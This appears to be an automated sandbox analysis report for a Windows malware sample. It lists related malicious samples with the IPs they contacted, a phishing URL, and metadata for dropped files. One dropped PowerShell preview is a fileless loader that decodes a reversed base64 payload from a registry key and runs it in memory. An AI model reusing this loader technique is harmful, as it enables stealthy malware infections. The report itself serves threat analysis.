                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            checkip.dyndns.comDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 158.101.44.242
                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.6.168
                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.6.168
                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ORACLE-BMC-31898USDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 158.101.44.242
                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.6.168
                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 193.122.6.168
                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 193.122.6.168
                                                            Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 158.101.44.242
                                                            rFACTURASALBARANESPENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 193.122.130.0
                                                            CLOUDFLARENETUSNfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                            • 104.16.123.96
                                                            63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                            • 104.16.124.96
                                                            ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.69.226
                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.69.226
                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                            • 188.114.96.3
                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 188.114.97.3
                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            [Inquiry] mv Palmela - CE replacement at your port, oa Nov. 22nd.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            CONTABODEQuotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                                            • 80.241.214.102
                                                            BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                            • 144.91.79.54
                                                            BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                            • 161.97.142.144
                                                            https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                            • 207.180.225.113
                                                            Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                                            • 144.91.79.54
                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                            • 5.189.178.202
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.96.3
                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            No context
                                                            Process:C:\Windows\System32\wermgr.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.5202496951648052
                                                            Encrypted:false
                                                            SSDEEP:96:CsaR0Fqvj+rxYid2RH3Uje0e3e/3hosM1QXIGZAX/d5FMT2SlPkpXmTAUf/VXT5t:DML+mG2R30hHxAzuiFCZ24lO8
                                                            MD5:C99B5C89597DC427F9665A6F143C68C3
                                                            SHA1:34D7728102A981A39E41747CE625B240C4A8EAE7
                                                            SHA-256:176AD9712BF9E8764F233CE04CD329DCCF103A8FD004B26245DC0DBB703323C2
                                                            SHA-512:B15838825ED4AFC1D70C3A210F1B1D4EAFAB9CACD3ED800206FAA347C8635506842348B2321C954D2F6D2638B00E59E06209F8910055B9DA76723E1B5E5F1C3F
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.0.7.7.4.1.5.0.4.7.2.5.4.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.0.7.4.6.2.9.6.7.3.0.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.1.4.6.9.e.8.-.9.4.e.8.-.4.5.3.4.-.a.a.9.f.-.4.b.2.9.5.0.b.3.5.f.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.4.-.7.0.7.0.-.e.f.8.b.b.7.3.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                            Process:C:\Windows\System32\wermgr.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.5338818710068783
                                                            Encrypted:false
                                                            SSDEEP:96:CXa3uFj2jLxrxYidNRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAtf/VXTT:GZgLxmGNR30wAAzuiFdZ24lO8
                                                            MD5:FE1DA4CA9E448B98B8A44D7AD49AE857
                                                            SHA1:B2FB0D4A51809F51799E0EA60A501F6CA975F13A
                                                            SHA-256:C1B9163C845E7CFC4BC10A512D37E1915DC2FBD071F6A11C382EA28A3296805F
                                                            SHA-512:6590D297351AA23FD866990B80A81C8D1B6DB17289622D50ED3E4D6BC2285C003F21D9B0C3FC6FC205B6FDADD306234E25B1FAD03E692E9D1805DA7FB392066B
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.0.7.6.5.2.3.0.3.6.6.1.4.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.0.7.4.6.2.8.2.5.1.0.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.5.4.b.f.f.5.-.5.d.0.d.-.4.d.3.f.-.9.a.1.4.-.b.2.f.6.c.1.4.1.4.5.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.6.0.-.0.0.0.1.-.0.0.1.4.-.8.7.a.4.-.2.e.9.5.b.7.3.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                            Process:C:\Windows\System32\wermgr.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):7416
                                                            Entropy (8bit):3.683671562243095
                                                            Encrypted:false
                                                            SSDEEP:96:RSIU6o7wVetb/RWw95l6YkWogmfHNV9reCQu5aMd20m:R6l7wVeJpWw95l6YkWogmftq4pd20m
                                                            MD5:F9E6A143650053026027BD4F62741DDE
                                                            SHA1:F98BF4B673A432B03D1A14E21D3AD9DDF377824F
                                                            SHA-256:7A600137F931CA0CD43DA0597A6DD6A10A46DB08E9A7998E711FAB5372956702
                                                            SHA-512:CC51D35918C3F96DF9E80234A1B7119A7A3FA5E58E1866A992CE0326A720A8BB7998997A091873B7ACAAB0F6D904ABCB828F32591F31092CEB106EEE4BAFD8FD
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.8.8.<./.P.i.
                                                            Process:C:\Windows\System32\wermgr.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):7230
                                                            Entropy (8bit):3.683485161152533
                                                            Encrypted:false
                                                            SSDEEP:96:RSIU6o7wVetbFxJLHVhV6Yk/ogmfHNp02cCQu5aMgZ0m:R6l7wVeJFxJL1hV6Yk/ogmftvc4pgZ0m
                                                            MD5:41A3ACEFFBCE8D4B0F6D33E0798A07C6
                                                            SHA1:087F9C761FFFBADB8501786D6EE3CDD645EB03BB
                                                            SHA-256:0F53E40EE97DFB70A7FD0652EF5695E3978D6703B1DEA63BAB80AD16AB5CE8CA
                                                            SHA-512:B06827B0B9BACF16256235A10A0193011547C1B1330BB71306ABEBD28C2AFFA5C4D84D51120C551DE75581D9D21AB5B19343A1C3C725F256A12A7F82E35E9DFA
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.
                                                            Process:C:\Windows\System32\wermgr.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4899
                                                            Entropy (8bit):4.568412030112732
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsBJg771I9EnWpW8VYFrYm8M4JFKlnOtSFrRyq8vT0Otuytfsd:uIjfTI7/W7VlJFKlntRWT0Tufsd
                                                            MD5:F737F76546C720CF30AE69CC96D97FEC
                                                            SHA1:21DBB327C8E62900360CB24BF71D5F8BE022C908
                                                            SHA-256:FAA34B66138A29DE3E5E97D585C0ABA571201041185C3992CA566B7BCB327D11
                                                            SHA-512:73BB7D5D524A2C6D80A905F9054B0FEDA3CA2AF2E03C7DAE562DE08D2E1FC4D033FA656A01D1F6F778579D1044B0CBB22E80411FBBF973A012B94F204DEE06E0
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\System32\wermgr.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4711
                                                            Entropy (8bit):4.509218256506956
                                                            Encrypted:false
                                                            SSDEEP:96:uIjfTI7/W7VKJFKl0F3DF2WTnF3DFdufhHd:uIfY/W704E7V7ufh9
                                                            MD5:1D06A8A69BD3B7D44376C09EC6AD9678
                                                            SHA1:C28364B7F2B995ADCB57879D8FFF41D649386F12
                                                            SHA-256:C6E46AE3851B6769890C1B38C59246BAE6DE578C61FC73F4D4D75BB440D0F6F2
                                                            SHA-512:1E8A9D1AEC3B680BB94EF6A44FE5DA3E0A439B1B895459353DF4A4637DC7CACFC64B6A477F6539EDA7926558EBAEE43AC4BC65B00A1ED2570F8DB075D4292630
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593507" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11887
                                                            Entropy (8bit):4.901437212034066
                                                            Encrypted:false
                                                            SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                            MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                            SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                            SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                            SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                            Malicious:false
                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3256
                                                            Entropy (8bit):5.404109340363203
                                                            Encrypted:false
                                                            SSDEEP:48:gEzsSU4xymdajm9qr9tz4RIoUQ/78Nf+oH0GxJZKaVEouYAgwd64rHLjtvwpPEhI:gEzlHxvJ9qrfIfl7Kf+olJ5Eo9Adrxwt
                                                            MD5:95772EFB0D98B0FDC1F3CD71213F4A49
                                                            SHA1:666A684CC4706D2013AECA319681E7ECD12BEAA3
                                                            SHA-256:3F74ACF9513B51D78314654F92B4105EF35E55F38748B4A24E32D023B61A859C
                                                            SHA-512:BFD108B69A240F3E678099A5E6DC361F6C674FBC96D13A905264A0A3F5925C50AE83407F9A2FAAD1EE8CE9BAB4F185FEAAE1AAB7700555B23371FD72FB05BD00
                                                            Malicious:false
                                                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):252
                                                            Entropy (8bit):5.355593960973263
                                                            Encrypted:false
                                                            SSDEEP:6:xVwe5ljxsu2xKbLtSXqo830Gxsj+EoXZuBiA2V0LYQ13jH2eFI59:772EtSXqdpc8Jci1V0LYQFH2eo
                                                            MD5:112890B95BB4E5F2A80B0C23882338D0
                                                            SHA1:3D91833CAEFE4A51AD343E728EB46D577430168D
                                                            SHA-256:76CBE043628A97A4BA714BB7B68B2D5CCE327256A0F47E3D47ECE05EE4A7F2F1
                                                            SHA-512:CE76161C6B8DB4BFFC6CD87279AADF091ED5CC67CDF6F69A85D68AC4FC2047C72C8AD93833E48AC819C0DCCB2554F4892D8C3B43E313E2D8286BE3CE0DF489E1
                                                            Malicious:false
                                                            Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\pcPseOUmXnpEaeF' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('pcPseOUmXnpEaeF')..Stop-Process -Name conhost -Force..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.710479057510546
                                                            Encrypted:false
